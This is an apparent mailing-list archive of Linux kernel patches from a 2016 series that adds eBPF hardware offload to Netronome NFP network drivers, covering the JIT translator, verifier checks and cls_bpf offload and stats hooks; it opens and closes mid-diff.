+   cmd = TC_CLSBPF_REPLACE;
+   } else {
+   obj = oldprog;
+   cmd = TC_CLSBPF_DESTROY;
+   }
+   } else {
+   if (!tc_should_offload(dev, tp, 0))
+   return;
+   cmd = TC_CLSBPF_ADD;
+   }
+
+   if (cls_bpf_offload_cmd(tp, obj, cmd))
+   return;
+
+   obj->offloaded = true;
+   if (oldprog)
+   oldprog->offloaded = false;
+}
+
+static void cls_bpf_stop_offload(struct tcf_proto *tp,
+struct cls_bpf_prog *prog)
+{
+   int err;
+
+   if (!prog->offloaded)
+   return;
+
+   err = cls_bpf_offload_cmd(tp, prog, TC_CLSBPF_DESTROY);
+   if (err) {
+   pr_err("Stopping hardware offload failed: %d\n", err);
+   return;
+   }
+
+   prog->offloaded = false;
+}
+
 static int cls_bpf_init(struct tcf_proto *tp)
 {
struct cls_bpf_head *head;
@@ -176,6 +242,7 @@ static int cls_bpf_delete(struct tcf_proto *tp, unsigned 
long arg)
 {
struct cls_bpf_prog *prog = (struct cls_bpf_prog *) arg;
 
+   cls_bpf_stop_offload(tp, prog);
list_del_rcu(&prog->link);
tcf_unbind_filter(tp, &prog->res);
call_rcu(&prog->rcu, __cls_bpf_delete_prog);
@@ -192,6 +259,7 @@ static bool cls_bpf_destroy(struct tcf_proto *tp, bool 
force)
return false;
 
list_for_each_entry_safe(prog, tmp, &head->plist, link) {
+   cls_bpf_stop_offload(tp, prog);
list_del_rcu(&prog->link);
tcf_unbind_filter(tp, &prog->res);
call_rcu(&prog->rcu, __cls_bpf_delete_prog);
@@ -413,6 +

[PATCHv6 net-next 09/15] nfp: bpf: add hardware bpf offload

2016-09-18 Thread Jakub Kicinski

Add hardware bpf offload on our smart NICs.  Detect if
capable firmware is loaded and use it to load the code JITed
with just added translator onto programmable engines.

This commit only supports offloading cls_bpf in legacy mode
(non-direct action).

Signed-off-by: Jakub Kicinski 
---
 drivers/net/ethernet/netronome/nfp/Makefile|   1 +
 drivers/net/ethernet/netronome/nfp/nfp_net.h   |  26 ++-
 .../net/ethernet/netronome/nfp/nfp_net_common.c|  40 +++-
 drivers/net/ethernet/netronome/nfp/nfp_net_ctrl.h  |  44 -
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   | 220 +
 5 files changed, 324 insertions(+), 7 deletions(-)
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_net_offload.c

diff --git a/drivers/net/ethernet/netronome/nfp/Makefile 
b/drivers/net/ethernet/netronome/nfp/Makefile
index 5f12689bf523..0efb2ba9a558 100644
--- a/drivers/net/ethernet/netronome/nfp/Makefile
+++ b/drivers/net/ethernet/netronome/nfp/Makefile
@@ -3,6 +3,7 @@ obj-$(CONFIG_NFP_NETVF) += nfp_netvf.o
 nfp_netvf-objs := \
nfp_net_common.o \
nfp_net_ethtool.o \
+   nfp_net_offload.o \
nfp_netvf_main.o
 
 ifeq ($(CONFIG_BPF_SYSCALL),y)
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net.h 
b/drivers/net/ethernet/netronome/nfp/nfp_net.h
index 690635660195..ea6f5e667f27 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net.h
@@ -220,7 +220,7 @@ struct nfp_net_tx_ring {
 #define PCIE_DESC_RX_I_TCP_CSUM_OK cpu_to_le16(BIT(11))
 #define PCIE_DESC_RX_I_UDP_CSUMcpu_to_le16(BIT(10))
 #define PCIE_DESC_RX_I_UDP_CSUM_OK cpu_to_le16(BIT(9))
-#define PCIE_DESC_RX_SPARE cpu_to_le16(BIT(8))
+#define PCIE_DESC_RX_BPF   cpu_to_le16(BIT(8))
 #define PCIE_DESC_RX_EOP   cpu_to_le16(BIT(7))
 #define PCIE_DESC_RX_IP4_CSUM  cpu_to_le16(BIT(6))
 #define PCIE_DESC_RX_IP4_CSUM_OK   cpu_to_le16(BIT(5))
@@ -413,6 +413,7 @@ static inline bool nfp_net_fw_ver_eq(struct 
nfp_net_fw_version *fw_ver,
  * @is_vf:  Is the driver attached to a VF?
  * @is_nfp3200: Is the driver for a NFP-3200 card?
  * @fw_loaded:  Is the firmware loaded?
+ * @bpf_offload_skip_sw:  Offloaded BPF program will not be rerun by cls_bpf
  * @ctrl:   Local copy of the control register/word.
  * @fl_bufsz:   Currently configured size of the freelist buffers
  * @rx_offset: Offset in the RX buffers where packet data starts
@@ -473,6 +474,7 @@ struct nfp_net {
unsigned is_vf:1;
unsigned is_nfp3200:1;
unsigned fw_loaded:1;
+   unsigned bpf_offload_skip_sw:1;
 
u32 ctrl;
u32 fl_bufsz;
@@ -561,12 +563,28 @@ struct nfp_net {
 /* Functions to read/write from/to a BAR
  * Performs any endian conversion necessary.
  */
+static inline u16 nn_readb(struct nfp_net *nn, int off)
+{
+   return readb(nn->ctrl_bar + off);
+}
+
 static inline void nn_writeb(struct nfp_net *nn, int off, u8 val)
 {
writeb(val, nn->ctrl_bar + off);
 }
 
-/* NFP-3200 can't handle 16-bit accesses too well - hence no readw/writew */
+/* NFP-3200 can't handle 16-bit accesses too well */
+static inline u16 nn_readw(struct nfp_net *nn, int off)
+{
+   WARN_ON_ONCE(nn->is_nfp3200);
+   return readw(nn->ctrl_bar + off);
+}
+
+static inline void nn_writew(struct nfp_net *nn, int off, u16 val)
+{
+   WARN_ON_ONCE(nn->is_nfp3200);
+   writew(val, nn->ctrl_bar + off);
+}
 
 static inline u32 nn_readl(struct nfp_net *nn, int off)
 {
@@ -757,4 +775,8 @@ static inline void nfp_net_debugfs_adapter_del(struct 
nfp_net *nn)
 }
 #endif /* CONFIG_NFP_NET_DEBUG */
 
+int
+nfp_net_bpf_offload(struct nfp_net *nn, u32 handle, __be16 proto,
+   struct tc_cls_bpf_offload *cls_bpf);
+
 #endif /* _NFP_NET_H_ */
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
index 252e4924de0f..51978dfe883b 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
@@ -60,6 +60,7 @@
 
 #include 
 
+#include 
 #include 
 
 #include "nfp_net_ctrl.h"
@@ -2382,6 +2383,31 @@ static struct rtnl_link_stats64 *nfp_net_stat64(struct 
net_device *netdev,
return stats;
 }
 
+static bool nfp_net_ebpf_capable(struct nfp_net *nn)
+{
+   if (nn->cap & NFP_NET_CFG_CTRL_BPF &&
+   nn_readb(nn, NFP_NET_CFG_BPF_ABI) == NFP_NET_BPF_ABI)
+   return true;
+   return false;
+}
+
+static int
+nfp_net_setup_tc(struct net_device *netdev, u32 handle, __be16 proto,
+struct tc_to_netdev *tc)
+{
+   struct nfp_net *nn = netdev_priv(netdev);
+
+   if (TC_H_MAJ(handle) != TC_H_MAJ(TC_H_INGRESS))
+   return -ENOTSUPP;
+   if (proto != htons(ETH_P_ALL))
+   return -ENOTSUPP;
+
+   if (tc->type == TC_SETUP_CLSBPF && nfp_ne

[PATCHv6 net-next 12/15] nfp: bpf: add packet marking support

2016-09-18 Thread Jakub Kicinski

Add missing ABI defines and eBPF instructions to allow
mark to be passed on and extend prepend parsing on the
RX path to pick it up from packet metadata.

Signed-off-by: Jakub Kicinski 
---
v3:
 - change metadata format.
---
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  2 +
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 19 +
 drivers/net/ethernet/netronome/nfp/nfp_net.h   |  2 +
 .../net/ethernet/netronome/nfp/nfp_net_common.c| 91 +-
 drivers/net/ethernet/netronome/nfp/nfp_net_ctrl.h  |  7 ++
 .../net/ethernet/netronome/nfp/nfp_netvf_main.c|  2 +-
 6 files changed, 101 insertions(+), 22 deletions(-)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
index 3726421e353f..2adb1d80c7b7 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
@@ -91,6 +91,8 @@ enum nfp_bpf_reg_type {
 #define imm_both(np)   reg_both((np)->regs_per_thread - STATIC_REG_IMM)
 
 #define NFP_BPF_ABI_FLAGS  reg_nnr(0)
+#define   NFP_BPF_ABI_FLAG_MARK1
+#define NFP_BPF_ABI_MARK   reg_nnr(1)
 #define NFP_BPF_ABI_PKTreg_nnr(2)
 #define NFP_BPF_ABI_LENreg_nnr(3)
 
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
index cfbf53607fc9..368381f0357f 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
@@ -674,6 +674,16 @@ static int construct_data_ld(struct nfp_prog *nfp_prog, 
u16 offset, u8 size)
return construct_data_ind_ld(nfp_prog, offset, 0, false, size);
 }
 
+static int wrp_set_mark(struct nfp_prog *nfp_prog, u8 src)
+{
+   emit_alu(nfp_prog, NFP_BPF_ABI_MARK,
+reg_none(), ALU_OP_NONE, reg_b(src));
+   emit_alu(nfp_prog, NFP_BPF_ABI_FLAGS,
+NFP_BPF_ABI_FLAGS, ALU_OP_OR, reg_imm(NFP_BPF_ABI_FLAG_MARK));
+
+   return 0;
+}
+
 static void
 wrp_alu_imm(struct nfp_prog *nfp_prog, u8 dst, enum alu_op alu_op, u32 imm)
 {
@@ -1117,6 +1127,14 @@ static int mem_ldx4(struct nfp_prog *nfp_prog, struct 
nfp_insn_meta *meta)
return 0;
 }
 
+static int mem_stx4(struct nfp_prog *nfp_prog, struct nfp_insn_meta *meta)
+{
+   if (meta->insn.off == offsetof(struct sk_buff, mark))
+   return wrp_set_mark(nfp_prog, meta->insn.src_reg * 2);
+
+   return -ENOTSUPP;
+}
+
 static int jump(struct nfp_prog *nfp_prog, struct nfp_insn_meta *meta)
 {
if (meta->insn.off < 0) /* TODO */
@@ -1306,6 +1324,7 @@ static const instr_cb_t instr_cb[256] = {
[BPF_LD | BPF_IND | BPF_H] =data_ind_ld2,
[BPF_LD | BPF_IND | BPF_W] =data_ind_ld4,
[BPF_LDX | BPF_MEM | BPF_W] =   mem_ldx4,
+   [BPF_STX | BPF_MEM | BPF_W] =   mem_stx4,
[BPF_JMP | BPF_JA | BPF_K] =jump,
[BPF_JMP | BPF_JEQ | BPF_K] =   jeq_imm,
[BPF_JMP | BPF_JGT | BPF_K] =   jgt_imm,
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net.h 
b/drivers/net/ethernet/netronome/nfp/nfp_net.h
index 13c6a9001b4d..ed824e11a1e3 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net.h
@@ -269,6 +269,8 @@ struct nfp_net_rx_desc {
};
 };
 
+#define NFP_NET_META_FIELD_MASK GENMASK(NFP_NET_META_FIELD_SIZE - 1, 0)
+
 struct nfp_net_rx_hash {
__be32 hash_type;
__be32 hash;
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
index f091eb758ca2..415691edcaa5 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_common.c
@@ -1293,38 +1293,72 @@ static void nfp_net_rx_csum(struct nfp_net *nn, struct 
nfp_net_r_vector *r_vec,
}
 }
 
-/**
- * nfp_net_set_hash() - Set SKB hash data
- * @netdev: adapter's net_device structure
- * @skb:   SKB to set the hash data on
- * @rxd:   RX descriptor
- *
- * The RSS hash and hash-type are pre-pended to the packet data.
- * Extract and decode it and set the skb fields.
- */
 static void nfp_net_set_hash(struct net_device *netdev, struct sk_buff *skb,
-struct nfp_net_rx_desc *rxd)
+unsigned int type, __be32 *hash)
 {
-   struct nfp_net_rx_hash *rx_hash;
-
-   if (!(rxd->rxd.flags & PCIE_DESC_RX_RSS) ||
-   !(netdev->features & NETIF_F_RXHASH))
+   if (!(netdev->features & NETIF_F_RXHASH))
return;
 
-   rx_hash = (struct nfp_net_rx_hash *)(skb->data - sizeof(*rx_hash));
-
-   switch (be32_to_cpu(rx_hash->hash_type)) {
+   switch (type) {
case NFP_NET_RSS_IPV4:
case NFP_NET_RSS_IPV6:
case NFP_NET_RSS_IPV6_EX:
-   skb_set_hash(skb, be32_to_cpu(rx_hash->hash), PKT_HASH_TYPE_L3);
+   skb_set_hash(skb, get_unaligned_be32(hash), PKT_HASH_TYPE_L3);
break;

[PATCHv6 net-next 10/15] net: cls_bpf: allow offloaded filters to update stats

2016-09-18 Thread Jakub Kicinski

Call into offloaded filters to update stats.

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
 include/net/pkt_cls.h |  1 +
 net/sched/cls_bpf.c   | 11 +++
 2 files changed, 12 insertions(+)

diff --git a/include/net/pkt_cls.h b/include/net/pkt_cls.h
index 57af9f3032ff..5ccaa4be7d96 100644
--- a/include/net/pkt_cls.h
+++ b/include/net/pkt_cls.h
@@ -490,6 +490,7 @@ enum tc_clsbpf_command {
TC_CLSBPF_ADD,
TC_CLSBPF_REPLACE,
TC_CLSBPF_DESTROY,
+   TC_CLSBPF_STATS,
 };
 
 struct tc_cls_bpf_offload {
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 18f9869cd4da..9b29e0673346 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -220,6 +220,15 @@ static void cls_bpf_stop_offload(struct tcf_proto *tp,
prog->offloaded = false;
 }
 
+static void cls_bpf_offload_update_stats(struct tcf_proto *tp,
+struct cls_bpf_prog *prog)
+{
+   if (!prog->offloaded)
+   return;
+
+   cls_bpf_offload_cmd(tp, prog, TC_CLSBPF_STATS);
+}
+
 static int cls_bpf_init(struct tcf_proto *tp)
 {
struct cls_bpf_head *head;
@@ -575,6 +584,8 @@ static int cls_bpf_dump(struct net *net, struct tcf_proto 
*tp, unsigned long fh,
 
tm->tcm_handle = prog->handle;
 
+   cls_bpf_offload_update_stats(tp, prog);
+
nest = nla_nest_start(skb, TCA_OPTIONS);
if (nest == NULL)
goto nla_put_failure;
-- 
1.9.1

[PATCHv6 net-next 15/15] nfp: bpf: add offload of TC direct action mode

2016-09-18 Thread Jakub Kicinski

Add offload of TC in direct action mode.  We just need
to provide appropriate checks in the verifier and
a new outro block to translate the exit codes to what
data path expects

Signed-off-by: Jakub Kicinski 
---
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  1 +
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 66 ++
 .../net/ethernet/netronome/nfp/nfp_bpf_verifier.c  | 11 +++-
 .../net/ethernet/netronome/nfp/nfp_net_offload.c   |  6 +-
 4 files changed, 82 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
index adbe0235d98e..fc220cd04115 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
@@ -61,6 +61,7 @@ enum static_regs {
 enum nfp_bpf_action_type {
NN_ACT_TC_DROP,
NN_ACT_TC_REDIR,
+   NN_ACT_DIRECT,
 };
 
 /* Software register representation, hardware encoding in asm.h */
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
index 434bef975c58..3de819acd68c 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
@@ -321,6 +321,16 @@ __emit_br(struct nfp_prog *nfp_prog, enum br_mask mask, 
enum br_ev_pip ev_pip,
nfp_prog_push(nfp_prog, insn);
 }
 
+static void emit_br_def(struct nfp_prog *nfp_prog, u16 addr, u8 defer)
+{
+   if (defer > 2) {
+   pr_err("BUG: branch defer out of bounds %d\n", defer);
+   nfp_prog->error = -EFAULT;
+   return;
+   }
+   __emit_br(nfp_prog, BR_UNC, BR_EV_PIP_UNCOND, BR_CSS_NONE, addr, defer);
+}
+
 static void
 emit_br(struct nfp_prog *nfp_prog, enum br_mask mask, u16 addr, u8 defer)
 {
@@ -1465,9 +1475,65 @@ static void nfp_outro_tc_legacy(struct nfp_prog 
*nfp_prog)
  SHF_SC_L_SHF, 16);
 }
 
+static void nfp_outro_tc_da(struct nfp_prog *nfp_prog)
+{
+   /* TC direct-action mode:
+*   0,1   okNOT SUPPORTED[1]
+*   2   drop  0x22 -> drop,  count as stat1
+*   4,5 nuke  0x02 -> drop
+*   7  redir  0x44 -> redir, count as stat2
+*   * unspec  0x11 -> pass,  count as stat0
+*
+* [1] We can't support OK and RECLASSIFY because we can't tell TC
+* the exact decision made.  We are forced to support UNSPEC
+* to handle aborts so that's the only one we handle for passing
+* packets up the stack.
+*/
+   /* Target for aborts */
+   nfp_prog->tgt_abort = nfp_prog_current_offset(nfp_prog);
+
+   emit_br_def(nfp_prog, nfp_prog->tgt_done, 2);
+
+   emit_alu(nfp_prog, reg_a(0),
+reg_none(), ALU_OP_NONE, NFP_BPF_ABI_FLAGS);
+   emit_ld_field(nfp_prog, reg_a(0), 0xc, reg_imm(0x11), SHF_SC_L_SHF, 16);
+
+   /* Target for normal exits */
+   nfp_prog->tgt_out = nfp_prog_current_offset(nfp_prog);
+
+   /* if R0 > 7 jump to abort */
+   emit_alu(nfp_prog, reg_none(), reg_imm(7), ALU_OP_SUB, reg_b(0));
+   emit_br(nfp_prog, BR_BLO, nfp_prog->tgt_abort, 0);
+   emit_alu(nfp_prog, reg_a(0),
+reg_none(), ALU_OP_NONE, NFP_BPF_ABI_FLAGS);
+
+   wrp_immed(nfp_prog, reg_b(2), 0x41221211);
+   wrp_immed(nfp_prog, reg_b(3), 0x41001211);
+
+   emit_shf(nfp_prog, reg_a(1),
+reg_none(), SHF_OP_NONE, reg_b(0), SHF_SC_L_SHF, 2);
+
+   emit_alu(nfp_prog, reg_none(), reg_a(1), ALU_OP_OR, reg_imm(0));
+   emit_shf(nfp_prog, reg_a(2),
+reg_imm(0xf), SHF_OP_AND, reg_b(2), SHF_SC_R_SHF, 0);
+
+   emit_alu(nfp_prog, reg_none(), reg_a(1), ALU_OP_OR, reg_imm(0));
+   emit_shf(nfp_prog, reg_b(2),
+reg_imm(0xf), SHF_OP_AND, reg_b(3), SHF_SC_R_SHF, 0);
+
+   emit_br_def(nfp_prog, nfp_prog->tgt_done, 2);
+
+   emit_shf(nfp_prog, reg_b(2),
+reg_a(2), SHF_OP_OR, reg_b(2), SHF_SC_L_SHF, 4);
+   emit_ld_field(nfp_prog, reg_a(0), 0xc, reg_b(2), SHF_SC_L_SHF, 16);
+}
+
 static void nfp_outro(struct nfp_prog *nfp_prog)
 {
switch (nfp_prog->act) {
+   case NN_ACT_DIRECT:
+   nfp_outro_tc_da(nfp_prog);
+   break;
case NN_ACT_TC_DROP:
case NN_ACT_TC_REDIR:
nfp_outro_tc_legacy(nfp_prog);
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
index ef6775b54168..144cae87f63a 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c
@@ -86,7 +86,16 @@ nfp_bpf_check_exit(struct nfp_prog *nfp_prog,
return -EINVAL;
}
 
-   if (reg0->imm != 0 && (reg0->imm & ~0U) != ~0U) {
+   if (nfp_prog->act != NN_ACT_DIRECT &&
+   reg0->imm != 0 && (reg0->imm & ~0U) != ~0U) {
+   pr_info("unsupported exit state: %d, imm: %l

[PATCHv6 net-next 14/15] nfp: bpf: add support for legacy redirect action

2016-09-18 Thread Jakub Kicinski

Data path has redirect support so expressing redirect
to the port frame came from is a trivial matter of
setting the right result code.

Signed-off-by: Jakub Kicinski 
---
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h | 1 +
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c | 2 ++
 drivers/net/ethernet/netronome/nfp/nfp_net_offload.c | 4 
 3 files changed, 7 insertions(+)

diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
index 2adb1d80c7b7..adbe0235d98e 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf.h
@@ -60,6 +60,7 @@ enum static_regs {
 
 enum nfp_bpf_action_type {
NN_ACT_TC_DROP,
+   NN_ACT_TC_REDIR,
 };
 
 /* Software register representation, hardware encoding in asm.h */
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c 
b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
index 368381f0357f..434bef975c58 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
@@ -1440,6 +1440,7 @@ static void nfp_outro_tc_legacy(struct nfp_prog *nfp_prog)
 {
const u8 act2code[] = {
[NN_ACT_TC_DROP]  = 0x22,
+   [NN_ACT_TC_REDIR] = 0x24
};
/* Target for aborts */
nfp_prog->tgt_abort = nfp_prog_current_offset(nfp_prog);
@@ -1468,6 +1469,7 @@ static void nfp_outro(struct nfp_prog *nfp_prog)
 {
switch (nfp_prog->act) {
case NN_ACT_TC_DROP:
+   case NN_ACT_TC_REDIR:
nfp_outro_tc_legacy(nfp_prog);
break;
}
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c 
b/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
index 0537a53e2174..1ec8e5b74651 100644
--- a/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
+++ b/drivers/net/ethernet/netronome/nfp/nfp_net_offload.c
@@ -123,6 +123,10 @@ nfp_net_bpf_get_act(struct nfp_net *nn, struct 
tc_cls_bpf_offload *cls_bpf)
list_for_each_entry(a, &actions, list) {
if (is_tcf_gact_shot(a))
return NN_ACT_TC_DROP;
+
+   if (is_tcf_mirred_redirect(a) &&
+   tcf_mirred_ifindex(a) == nn->netdev->ifindex)
+   return NN_ACT_TC_REDIR;
}
 
return -ENOTSUPP;
-- 
1.9.1

[PATCHv6 net-next 07/15] bpf: recognize 64bit immediate loads as consts

2016-09-18 Thread Jakub Kicinski

When running as parser interpret BPF_LD | BPF_IMM | BPF_DW
instructions as loading CONST_IMM with the value stored
in imm.  The verifier will continue not recognizing those
due to concerns about search space/program complexity
increase.

Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
Acked-by: Daniel Borkmann 
---
v3:
 - limit to parsers.
---
 kernel/bpf/verifier.c | 14 --
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index ff03cd07f761..1612f7364c42 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -1760,9 +1760,19 @@ static int check_ld_imm(struct bpf_verifier_env *env, 
struct bpf_insn *insn)
if (err)
return err;
 
-   if (insn->src_reg == 0)
-   /* generic move 64-bit immediate into a register */
+   if (insn->src_reg == 0) {
+   /* generic move 64-bit immediate into a register,
+* only analyzer needs to collect the ld_imm value.
+*/
+   u64 imm = ((u64)(insn + 1)->imm << 32) | (u32)insn->imm;
+
+   if (!env->analyzer_ops)
+   return 0;
+
+   regs[insn->dst_reg].type = CONST_IMM;
+   regs[insn->dst_reg].imm = imm;
return 0;
+   }
 
/* replace_map_fd_with_map_ptr() should have caught bad ld_imm64 */
BUG_ON(insn->src_reg != BPF_PSEUDO_MAP_FD);
-- 
1.9.1

[PATCHv6 net-next 08/15] nfp: add BPF to NFP code translator

2016-09-18 Thread Jakub Kicinski

Add translator for JITing eBPF to operations which
can be executed on NFP's programmable engines.

Signed-off-by: Jakub Kicinski 
---
v6:
 - explicitly check for registers >= MAX_BPF_REG;
 - fix mem leak.
v4:
 - use bitfield.h directly.
v3:
 - don't clone the program for the verifier (no longer needed);
 - temporarily add a local copy of macros from bitfield.h.

NOTE: this one will probably trigger buildbot failures because
  it depends on pull request from wireless-drivers-next.
---
 drivers/net/ethernet/netronome/nfp/Makefile|6 +
 drivers/net/ethernet/netronome/nfp/nfp_asm.h   |  233 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf.h   |  208 +++
 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c   | 1724 
 .../net/ethernet/netronome/nfp/nfp_bpf_verifier.c  |  162 ++
 5 files changed, 2333 insertions(+)
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_asm.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf.h
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_jit.c
 create mode 100644 drivers/net/ethernet/netronome/nfp/nfp_bpf_verifier.c

diff --git a/drivers/net/ethernet/netronome/nfp/Makefile 
b/drivers/net/ethernet/netronome/nfp/Makefile
index 68178819ff12..5f12689bf523 100644
--- a/drivers/net/ethernet/netronome/nfp/Makefile
+++ b/drivers/net/ethernet/netronome/nfp/Makefile
@@ -5,4 +5,10 @@ nfp_netvf-objs := \
nfp_net_ethtool.o \
nfp_netvf_main.o
 
+ifeq ($(CONFIG_BPF_SYSCALL),y)
+nfp_netvf-objs += \
+   nfp_bpf_verifier.o \
+   nfp_bpf_jit.o
+endif
+
 nfp_netvf-$(CONFIG_NFP_NET_DEBUG) += nfp_net_debugfs.o
diff --git a/drivers/net/ethernet/netronome/nfp/nfp_asm.h 
b/drivers/net/ethernet/netronome/nfp/nfp_asm.h
new file mode 100644
index ..22484b6fd3e8
--- /dev/null
+++ b/drivers/net/ethernet/netronome/nfp/nfp_asm.h
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2016 Netronome Systems, Inc.
+ *
+ * This software is dual licensed under the GNU General License Version 2,
+ * June 1991 as shown in the file COPYING in the top-level directory of this
+ * source tree or the BSD 2-Clause License provided below.  You have the
+ * option to license this software under the complete terms of either license.
+ *
+ * The BSD 2-Clause License:
+ *
+ * Redistribution and use in source and binary forms, with or
+ * without modification, are permitted provided that the following
+ * conditions are met:
+ *
+ *  1. Redistributions of source code must retain the above
+ * copyright notice, this list of conditions and the following
+ * disclaimer.
+ *
+ *  2. Redistributions in binary form must reproduce the above
+ * copyright notice, this list of conditions and the following
+ * disclaimer in the documentation and/or other materials
+ * provided with the distribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+ * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+ * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+ * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
+ * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
+ * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
+ * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+#ifndef __NFP_ASM_H__
+#define __NFP_ASM_H__ 1
+
+#include "nfp_bpf.h"
+
+#define REG_NONE   0
+
+#define RE_REG_NO_DST  0x020
+#define RE_REG_IMM 0x020
+#define RE_REG_IMM_encode(x)   \
+   (RE_REG_IMM | ((x) & 0x1f) | (((x) & 0x60) << 1))
+#define RE_REG_IMM_MAX  0x07fULL
+#define RE_REG_XFR 0x080
+
+#define UR_REG_XFR 0x180
+#define UR_REG_NN  0x280
+#define UR_REG_NO_DST  0x300
+#define UR_REG_IMM UR_REG_NO_DST
+#define UR_REG_IMM_encode(x) (UR_REG_IMM | (x))
+#define UR_REG_IMM_MAX  0x0ffULL
+
+#define OP_BR_BASE 0x0d80020ULL
+#define OP_BR_BASE_MASK0x0f8000c3ce0ULL
+#define OP_BR_MASK 0x01fULL
+#define OP_BR_EV_PIP   0x300ULL
+#define OP_BR_CSS  0x003c000ULL
+#define OP_BR_DEFBR0x030ULL
+#define OP_BR_ADDR_LO  0x007ffc0ULL
+#define OP_BR_ADDR_HI  0x100ULL
+
+#define nfp_is_br(_insn)   \
+   (((_insn) & OP_BR_BASE_MASK) == OP_BR_BASE)
+
+enum br_mask {
+   BR_BEQ = 0x00,
+   BR_BNE = 0x01,
+   BR_BHS = 0x04,
+   BR_BLO = 0x05,
+   BR_BGE = 0x08,
+   BR_UNC = 0x18,
+};
+
+enum br_ev_pip {
+   BR_EV_PIP_UNCOND = 0,
+   BR_EV_PIP_COND = 1,
+};
+
+enum br_ctx_signal_state {
+   BR_CSS_NONE = 2,
+};
+
+#define OP_BBYTE_BASE  0x0c8ULL
+#define OP_BB_A_SRC0x0ffULL
+#define OP_BB_BYTE 0x300ULL
+#define OP_BB_B_SRC0x003fc00ULL
+#define OP_BB_I8   0x004ULL
+#define OP_BB_EQ   0x008ULL
+#define OP_BB_DEFBR0x030ULL
+#defin

[PATCHv6 net-next 11/15] nfp: bpf: allow offloaded filters to update stats

2016-09-18 Thread Jakub Kicinski

Periodically poll stats and call into offloaded actions
to update them.

Signed-off-by: Jakub Kicinski 
---
v3:
 - add missing hunk with ethtool stats.
---
 drivers/net/ethernet/netronome/nfp/nfp_net.h   | 19 +++
